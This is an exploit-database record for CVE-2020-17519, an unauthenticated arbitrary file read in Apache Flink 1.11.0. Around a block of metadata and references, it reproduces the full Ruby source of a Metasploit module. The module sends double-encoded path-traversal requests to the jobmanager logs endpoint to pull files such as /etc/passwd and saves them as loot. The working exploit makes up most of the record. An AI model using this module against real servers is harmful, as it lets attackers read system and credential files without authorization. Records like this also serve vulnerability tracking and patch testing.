ID
VAR-E-202101-0084
CVE
| cve_id: | CVE-2020-17519 | Trust: 1.5 |
EDB ID
49398
TITLE
Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit) - Java webapps Exploit
Trust: 0.6
DESCRIPTION
Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit). CVE-2020-17519 . webapps exploit for Java platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | apache | model: | flink | scope: | eq | version: | 1.11.0 | Trust: 1.6 |
| vendor: | apache | model: | flink arbitrary file read | scope: | eq | version: | 1.11.0 | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'Apache Flink File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
allowing arbitrary file read with the web server privileges
},
'Author' =>
[
'0rich1 - Ant Security FG Lab', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-17519'],
['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 05 2021'
))
register_options([
OptInt.new('DEPTH',[true,'Traversal Depth',12]),
OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])
])
end
def run_host(ip)
traversal = '..%252f' * datastore['DEPTH']
filename = datastore['FILEPATH'].gsub("/","%252f")
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),
})
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'apache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Unauthenticated Arbitrary File Read (Metasploit)
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
CREDITS
SunCSR Team
Trust: 0.6
EXTERNAL IDS
| db: | OPENWALL | id: | OSS-SECURITY/2021/01/05/2 | Trust: 2.1 |
| db: | NVD | id: | CVE-2020-17519 | Trust: 2.1 |
| db: | EXPLOIT-DB | id: | 49398 | Trust: 1.6 |
| db: | EDBNET | id: | 103885 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 160849 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2020-17519 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/49398/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 160849 |
| db: | EXPLOIT-DB | id: | 49398 |
| db: | EDBNET | id: | 103885 |
LAST UPDATE DATE
2022-07-27T09:18:07.169000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 160849 | date: | 2021-01-08T14:46:54 |
| db: | EXPLOIT-DB | id: | 49398 | date: | 2021-01-08T00:00:00 |
| db: | EDBNET | id: | 103885 | date: | 2021-01-08T00:00:00 |